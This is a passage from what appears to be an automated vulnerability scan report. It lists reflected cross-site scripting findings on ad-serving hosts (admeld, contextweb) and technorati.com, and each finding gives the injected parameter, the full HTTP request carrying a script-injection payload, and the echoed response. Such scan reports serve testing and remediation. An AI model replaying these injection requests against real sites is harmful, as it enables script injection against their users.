User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meld_sess=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9; D41U=CT-1

Response

HTTP/1.1 200 OK
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
X-AdMeld-Debug: ...[SNIP]...
Content-Length: 364
Content-Type: application/javascript
Date: Thu, 21 Apr 2011 01:28:01 GMT
Connection: close
Set-Cookie: D41U=3ZP6aPgJzYQImYO2fkBZoKF-nc31zVj-pLzxjzthWC1M8tPub3s1d8g; expires=Thu, 19-May-2011 01:28:00 GMT; path=/; domain=.tag.admeld.com
P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"

GlamAdmeldRenderJsAdabcb9<script>alert(1)</script>3d8eb2f0e91({"ad":{"id":-1,"adProviderId":0,"adProviderName":"admeldpsa","width":728,"height":90,"container":"ADMELD6529836193","bid":0.00,"requestId":"6a4a67cf-464d-40b9-8ede-61afbba16d7b","views":0,"expires":13
...[SNIP]...

3.457. http://tag.admeld.com/ad/json/100/glammedia/728x90/367631667 [container parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/json/100/glammedia/728x90/367631667

Issue detail

The value of the container request parameter is copied into the HTML document as plain text between tags. The payload 6bce9<script>alert(1)</script>11d949db645 was submitted in the container parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ad/json/100/glammedia/728x90/367631667?01AD=3ZP6aPgJzYQImYO2fkBZoKF-nc31zVj-pLzxjzthWC1M8tPub3s1d8g&01RI=035843F03C56E88&01NA=&url=http%3A//poponthepop.com/2011/04/lindsay-lohan-loses-victoria-gotti-role/&callback=GlamAdmeldRenderJsAd&floor_price=0.70&container=ADMELD65298361936bce9<script>alert(1)</script>11d949db645 HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://poponthepop.com/2011/04/lindsay-lohan-loses-victoria-gotti-role/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meld_sess=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9; D41U=CT-1

Response

HTTP/1.1 200 OK
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
X-AdMeld-Debug: ...[SNIP]...
Content-Length: 364
Content-Type: application/javascript
Date: Thu, 21 Apr 2011 01:28:04 GMT
Connection: close
Set-Cookie: D41U=3ZP6aPgJzYQImYO2fkBZoKF-nc31zVj-pLzxjzthWC1M8tPub3s1d8g; expires=Thu, 19-May-2011 01:28:04 GMT; path=/; domain=.tag.admeld.com
P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"

GlamAdmeldRenderJsAd({"ad":{"id":-1,"adProviderId":0,"adProviderName":"admeldpsa","width":728,"height":90,"container":"ADMELD65298361936bce9<script>alert(1)</script>11d949db645","bid":0.00,"requestId":"1d07248e-e328-4a67-a9d2-ff65ebe5d3be","views":0,"expires":1303349344,"creative":"<img src=\"http://tag.admeld.com/psa/adc_es_green_728x90.jpg\"/>
...[SNIP]...

3.458. http://tag.contextweb.com/TagPublish/getjs.aspx [action parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the action request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e5496"%3balert(1)//914834f4ab8 was submitted in the action parameter. This input was echoed as e5496";alert(1)//914834f4ab8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TagPublish/getjs.aspx?action=VIEWADe5496"%3balert(1)//914834f4ab8&cwrun=200&cwadformat=728X90&cwpid=529997&cwwidth=728&cwheight=90&cwpnet=1&cwtagid=88377 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/imp/iframe/100/glammedia/728x90/367631667/ac5afe89-dbe3-4a99-9c60-59f4fb495cb9/d56a8ca8-fcd6-4f11-be56-d400a24d3999?url=http%3A%2F%2Fpoponthepop%2Ecom%2F2011%2F04%2Flindsay%2Dlohan%2Dloses%2Dvictoria%2Dgotti%2Drole%2F&price_floor=&r=1303349044
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: V=wOebwAz4UvVv

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
X-Powered-By: ASP.NET
CW-Server: CW-WEB25
Cache-Control: public, must-revalidate, max-age=1000
Last-Modified: Thu, 07 Apr 2011 16:03:49 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 5734
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Thu, 21 Apr 2011 01:27:54 GMT
Connection: close
Set-Cookie: cw=cw; domain=.contextweb.com; path=/

function cw_Process(){try{var cu="http://tag.contextweb.com/TagPublish/getad.aspx";var cp="529997";var ct="88377";var cf="728X90";var ca="VIEWADe5496";alert(1)//914834f4ab8";var cr="200";var cw="728";var ch="90";var cn="1";var cads="0";String.prototype.cwcontains=function(s){return(this.toLowerCase().indexOf(s.toLowerCase())!= -1);};var _nxy=[-1,-1];var _cwd=document;var
...[SNIP]...

3.459. http://tag.contextweb.com/TagPublish/getjs.aspx [cwadformat parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the cwadformat request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fb321"%3balert(1)//5d5ca387a74 was submitted in the cwadformat parameter. This input was echoed as fb321";alert(1)//5d5ca387a74 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TagPublish/getjs.aspx?01AD=3bZ_cGKSaikCutesUynzUXb59QbtOHa7Nv35a38qe_dW_2SdvoXWHsQ&01RI=9FD2A2D39A1CA44&01NA=&action=VIEWAD&cwrun=200&cwadformat=728X90fb321"%3balert(1)//5d5ca387a74&cwpid=529997&cwwidth=728&cwheight=90&cwpnet=1&cwtagid=88377 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/imp/iframe/100/glammedia/728x90/367631667/ac5afe89-dbe3-4a99-9c60-59f4fb495cb9/d56a8ca8-fcd6-4f11-be56-d400a24d3999?url=http%3A%2F%2Fpoponthepop%2Ecom%2F2011%2F04%2Flindsay%2Dlohan%2Dloses%2Dvictoria%2Dgotti%2Drole%2F&price_floor=&r=1303349044
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: V=wOebwAz4UvVv; C2W4=CT-1

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
CW-Server: CW-WEB24
Cache-Control: public, must-revalidate, max-age=1000
Last-Modified: Thu, 07 Apr 2011 16:03:49 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 5734
Date: Thu, 21 Apr 2011 01:28:01 GMT
Connection: close
Set-Cookie: C2W4=3bZ_cGKSaikCutesUynzUXb59QbtOHa7Nv35a38qe_dW_2SdvoXWHsQ; expires=Thu, 19-May-2011 01:28:01 GMT; path=/; domain=.contextweb.com
Set-Cookie: cw=cw; domain=.contextweb.com; path=/
P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"

function cw_Process(){try{var cu="http://tag.contextweb.com/TagPublish/getad.aspx";var cp="529997";var ct="88377";var cf="728X90fb321";alert(1)//5d5ca387a74";var ca="VIEWAD";var cr="200";var cw="728";var ch="90";var cn="1";var cads="0";String.prototype.cwcontains=function(s){return(this.toLowerCase().indexOf(s.toLowerCase())!= -1);};var _nxy=[-1,-1];var _
...[SNIP]...

3.460. http://tag.contextweb.com/TagPublish/getjs.aspx [cwheight parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the cwheight request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3c563"%3balert(1)//237f60e5c6d was submitted in the cwheight parameter. This input was echoed as 3c563";alert(1)//237f60e5c6d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TagPublish/getjs.aspx?01AD=3bZ_cGKSaikCutesUynzUXb59QbtOHa7Nv35a38qe_dW_2SdvoXWHsQ&01RI=9FD2A2D39A1CA44&01NA=&action=VIEWAD&cwrun=200&cwadformat=728X90&cwpid=529997&cwwidth=728&cwheight=903c563"%3balert(1)//237f60e5c6d&cwpnet=1&cwtagid=88377 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/imp/iframe/100/glammedia/728x90/367631667/ac5afe89-dbe3-4a99-9c60-59f4fb495cb9/d56a8ca8-fcd6-4f11-be56-d400a24d3999?url=http%3A%2F%2Fpoponthepop%2Ecom%2F2011%2F04%2Flindsay%2Dlohan%2Dloses%2Dvictoria%2Dgotti%2Drole%2F&price_floor=&r=1303349044
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: V=wOebwAz4UvVv; C2W4=CT-1

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
CW-Server: CW-WEB24
Cache-Control: public, must-revalidate, max-age=1000
Last-Modified: Thu, 07 Apr 2011 16:03:49 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 5734
Date: Thu, 21 Apr 2011 01:28:02 GMT
Connection: close
Set-Cookie: C2W4=3bZ_cGKSaikCutesUynzUXb59QbtOHa7Nv35a38qe_dW_2SdvoXWHsQ; expires=Thu, 19-May-2011 01:28:02 GMT; path=/; domain=.contextweb.com
Set-Cookie: cw=cw; domain=.contextweb.com; path=/
P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"

function cw_Process(){try{var cu="http://tag.contextweb.com/TagPublish/getad.aspx";var cp="529997";var ct="88377";var cf="728X90";var ca="VIEWAD";var cr="200";var cw="728";var ch="903c563";alert(1)//237f60e5c6d";var cn="1";var cads="0";String.prototype.cwcontains=function(s){return(this.toLowerCase().indexOf(s.toLowerCase())!= -1);};var _nxy=[-1,-1];var _cwd=document;var _cww=window;var _cwu="undefined";var
...[SNIP]...

3.461. http://tag.contextweb.com/TagPublish/getjs.aspx [cwpid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the cwpid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a66cb"%3balert(1)//a2d3d91b255 was submitted in the cwpid parameter. This input was echoed as a66cb";alert(1)//a2d3d91b255 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TagPublish/getjs.aspx?01AD=3bZ_cGKSaikCutesUynzUXb59QbtOHa7Nv35a38qe_dW_2SdvoXWHsQ&01RI=9FD2A2D39A1CA44&01NA=&action=VIEWAD&cwrun=200&cwadformat=728X90&cwpid=529997a66cb"%3balert(1)//a2d3d91b255&cwwidth=728&cwheight=90&cwpnet=1&cwtagid=88377 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/imp/iframe/100/glammedia/728x90/367631667/ac5afe89-dbe3-4a99-9c60-59f4fb495cb9/d56a8ca8-fcd6-4f11-be56-d400a24d3999?url=http%3A%2F%2Fpoponthepop%2Ecom%2F2011%2F04%2Flindsay%2Dlohan%2Dloses%2Dvictoria%2Dgotti%2Drole%2F&price_floor=&r=1303349044
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: V=wOebwAz4UvVv; C2W4=CT-1

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
CW-Server: CW-WEB30
Cache-Control: public, must-revalidate, max-age=1000
Last-Modified: Thu, 07 Apr 2011 16:03:49 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 5734
Date: Thu, 21 Apr 2011 01:28:02 GMT
Connection: close
Set-Cookie: C2W4=3bZ_cGKSaikCutesUynzUXb59QbtOHa7Nv35a38qe_dW_2SdvoXWHsQ; expires=Thu, 19-May-2011 01:28:02 GMT; path=/; domain=.contextweb.com
Set-Cookie: cw=cw; domain=.contextweb.com; path=/
P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"

function cw_Process(){try{var cu="http://tag.contextweb.com/TagPublish/getad.aspx";var cp="529997a66cb";alert(1)//a2d3d91b255";var ct="88377";var cf="728X90";var ca="VIEWAD";var cr="200";var cw="728";var ch="90";var cn="1";var cads="0";String.prototype.cwcontains=function(s){return(this.toLowerCase().indexOf(s.toLowerCase())
...[SNIP]...

3.462. http://tag.contextweb.com/TagPublish/getjs.aspx [cwpnet parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the cwpnet request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 28960"%3balert(1)//e883c538ed5 was submitted in the cwpnet parameter. This input was echoed as 28960";alert(1)//e883c538ed5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TagPublish/getjs.aspx?01AD=3bZ_cGKSaikCutesUynzUXb59QbtOHa7Nv35a38qe_dW_2SdvoXWHsQ&01RI=9FD2A2D39A1CA44&01NA=&action=VIEWAD&cwrun=200&cwadformat=728X90&cwpid=529997&cwwidth=728&cwheight=90&cwpnet=128960"%3balert(1)//e883c538ed5&cwtagid=88377 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/imp/iframe/100/glammedia/728x90/367631667/ac5afe89-dbe3-4a99-9c60-59f4fb495cb9/d56a8ca8-fcd6-4f11-be56-d400a24d3999?url=http%3A%2F%2Fpoponthepop%2Ecom%2F2011%2F04%2Flindsay%2Dlohan%2Dloses%2Dvictoria%2Dgotti%2Drole%2F&price_floor=&r=1303349044
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: V=wOebwAz4UvVv; C2W4=CT-1

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
CW-Server: CW-WEB22
Cache-Control: public, must-revalidate, max-age=1000
Last-Modified: Thu, 07 Apr 2011 16:03:49 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 5734
Date: Thu, 21 Apr 2011 01:28:02 GMT
Connection: close
Set-Cookie: C2W4=3bZ_cGKSaikCutesUynzUXb59QbtOHa7Nv35a38qe_dW_2SdvoXWHsQ; expires=Thu, 19-May-2011 01:28:02 GMT; path=/; domain=.contextweb.com
Set-Cookie: cw=cw; domain=.contextweb.com; path=/
P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"

function cw_Process(){try{var cu="http://tag.contextweb.com/TagPublish/getad.aspx";var cp="529997";var ct="88377";var cf="728X90";var ca="VIEWAD";var cr="200";var cw="728";var ch="90";var cn="128960";alert(1)//e883c538ed5";var cads="0";String.prototype.cwcontains=function(s){return(this.toLowerCase().indexOf(s.toLowerCase())!= -1);};var _nxy=[-1,-1];var _cwd=document;var _cww=window;var _cwu="undefined";var _cwn=naviga
...[SNIP]...

3.463. http://tag.contextweb.com/TagPublish/getjs.aspx [cwrun parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the cwrun request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fe6bb"%3balert(1)//3471d1d5975 was submitted in the cwrun parameter. This input was echoed as fe6bb";alert(1)//3471d1d5975 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200fe6bb"%3balert(1)//3471d1d5975&cwadformat=728X90&cwpid=529997&cwwidth=728&cwheight=90&cwpnet=1&cwtagid=88377 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/imp/iframe/100/glammedia/728x90/367631667/ac5afe89-dbe3-4a99-9c60-59f4fb495cb9/d56a8ca8-fcd6-4f11-be56-d400a24d3999?url=http%3A%2F%2Fpoponthepop%2Ecom%2F2011%2F04%2Flindsay%2Dlohan%2Dloses%2Dvictoria%2Dgotti%2Drole%2F&price_floor=&r=1303349044
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: V=wOebwAz4UvVv

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
CW-Server: CW-WEB31
Cache-Control: public, must-revalidate, max-age=1000
Last-Modified: Thu, 07 Apr 2011 16:03:49 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 5734
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Thu, 21 Apr 2011 01:27:55 GMT
Connection: close
Set-Cookie: cw=cw; domain=.contextweb.com; path=/

function cw_Process(){try{var cu="http://tag.contextweb.com/TagPublish/getad.aspx";var cp="529997";var ct="88377";var cf="728X90";var ca="VIEWAD";var cr="200fe6bb";alert(1)//3471d1d5975";var cw="728";var ch="90";var cn="1";var cads="0";String.prototype.cwcontains=function(s){return(this.toLowerCase().indexOf(s.toLowerCase())!= -1);};var _nxy=[-1,-1];var _cwd=document;var _cww=window;
...[SNIP]...

3.464. http://tag.contextweb.com/TagPublish/getjs.aspx [cwtagid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the cwtagid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 29bcb"%3balert(1)//ac69a2e681e was submitted in the cwtagid parameter. This input was echoed as 29bcb";alert(1)//ac69a2e681e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TagPublish/getjs.aspx?01AD=3bZ_cGKSaikCutesUynzUXb59QbtOHa7Nv35a38qe_dW_2SdvoXWHsQ&01RI=9FD2A2D39A1CA44&01NA=&action=VIEWAD&cwrun=200&cwadformat=728X90&cwpid=529997&cwwidth=728&cwheight=90&cwpnet=1&cwtagid=8837729bcb"%3balert(1)//ac69a2e681e HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/imp/iframe/100/glammedia/728x90/367631667/ac5afe89-dbe3-4a99-9c60-59f4fb495cb9/d56a8ca8-fcd6-4f11-be56-d400a24d3999?url=http%3A%2F%2Fpoponthepop%2Ecom%2F2011%2F04%2Flindsay%2Dlohan%2Dloses%2Dvictoria%2Dgotti%2Drole%2F&price_floor=&r=1303349044
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: V=wOebwAz4UvVv; C2W4=CT-1

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
CW-Server: CW-WEB26
Cache-Control: public, must-revalidate, max-age=1000
Last-Modified: Thu, 07 Apr 2011 16:03:49 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 5734
Date: Thu, 21 Apr 2011 01:28:02 GMT
Connection: close
Set-Cookie: C2W4=3bZ_cGKSaikCutesUynzUXb59QbtOHa7Nv35a38qe_dW_2SdvoXWHsQ; expires=Thu, 19-May-2011 01:28:02 GMT; path=/; domain=.contextweb.com
Set-Cookie: cw=cw; domain=.contextweb.com; path=/
P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"

function cw_Process(){try{var cu="http://tag.contextweb.com/TagPublish/getad.aspx";var cp="529997";var ct="8837729bcb";alert(1)//ac69a2e681e";var cf="728X90";var ca="VIEWAD";var cr="200";var cw="728";var ch="90";var cn="1";var cads="0";String.prototype.cwcontains=function(s){return(this.toLowerCase().indexOf(s.toLowerCase())!= -1);};var _n
...[SNIP]...

3.465. http://tag.contextweb.com/TagPublish/getjs.aspx [cwwidth parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the cwwidth request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c0eb4"%3balert(1)//a76eb80ef0e was submitted in the cwwidth parameter. This input was echoed as c0eb4";alert(1)//a76eb80ef0e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TagPublish/getjs.aspx?01AD=3bZ_cGKSaikCutesUynzUXb59QbtOHa7Nv35a38qe_dW_2SdvoXWHsQ&01RI=9FD2A2D39A1CA44&01NA=&action=VIEWAD&cwrun=200&cwadformat=728X90&cwpid=529997&cwwidth=728c0eb4"%3balert(1)//a76eb80ef0e&cwheight=90&cwpnet=1&cwtagid=88377 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/imp/iframe/100/glammedia/728x90/367631667/ac5afe89-dbe3-4a99-9c60-59f4fb495cb9/d56a8ca8-fcd6-4f11-be56-d400a24d3999?url=http%3A%2F%2Fpoponthepop%2Ecom%2F2011%2F04%2Flindsay%2Dlohan%2Dloses%2Dvictoria%2Dgotti%2Drole%2F&price_floor=&r=1303349044
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: V=wOebwAz4UvVv; C2W4=CT-1

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
CW-Server: CW-WEB25
Cache-Control: public, must-revalidate, max-age=1000
Last-Modified: Thu, 07 Apr 2011 16:03:49 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 5734
Date: Thu, 21 Apr 2011 01:28:02 GMT
Connection: close
Set-Cookie: C2W4=3bZ_cGKSaikCutesUynzUXb59QbtOHa7Nv35a38qe_dW_2SdvoXWHsQ; expires=Thu, 19-May-2011 01:28:02 GMT; path=/; domain=.contextweb.com
Set-Cookie: cw=cw; domain=.contextweb.com; path=/
P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"

function cw_Process(){try{var cu="http://tag.contextweb.com/TagPublish/getad.aspx";var cp="529997";var ct="88377";var cf="728X90";var ca="VIEWAD";var cr="200";var cw="728c0eb4";alert(1)//a76eb80ef0e";var ch="90";var cn="1";var cads="0";String.prototype.cwcontains=function(s){return(this.toLowerCase().indexOf(s.toLowerCase())!= -1);};var _nxy=[-1,-1];var _cwd=document;var _cww=window;var _cwu="und
...[SNIP]...

3.466. http://technorati.com/cosmos/search.html [url parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://technorati.com
Path:   /cosmos/search.html

Issue detail

The value of the url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a773e"><script>alert(1)</script>dab46f51ed7 was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /cosmos/search.html?url=a773e"><script>alert(1)</script>dab46f51ed7 HTTP/1.1
Host: technorati.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 02:17:09 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: tvisitor=10.15.116.210.1298688146319064; path=/; expires=Thu, 25-Feb-16 02:42:26 GMT; domain=.technorati.com
Set-Cookie: NEWTRSESSID=93139fd48176819489f0aeb0fc613749; expires=Mon, 30-May-2011 02:17:09 GMT; path=/; domain=technorati.com
Vary: Accept-Encoding
Connection: close
Content-Length: 34801


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head profile="http://gmp
...[SNIP]...
<link rel="alternate" type="application/rss+xml" href="http://www.ingboo.com/pvm/redir?tid=696.10160&return=posts&q=a773e"><script>alert(1)</script>dab46f51ed7&authority=high&client=rss" title="Technorati search results for a773e">
...[SNIP]...

3.467. http://technorati.com/cosmos/search.html [url parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://technorati.com
Path:   /cosmos/search.html

Issue detail

The value of the url request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5eb43'-alert(1)-'f01b11d4625 was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cosmos/search.html?url=5eb43'-alert(1)-'f01b11d4625 HTTP/1.1
Host: technorati.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 02:17:14 GMT
Server: Apache
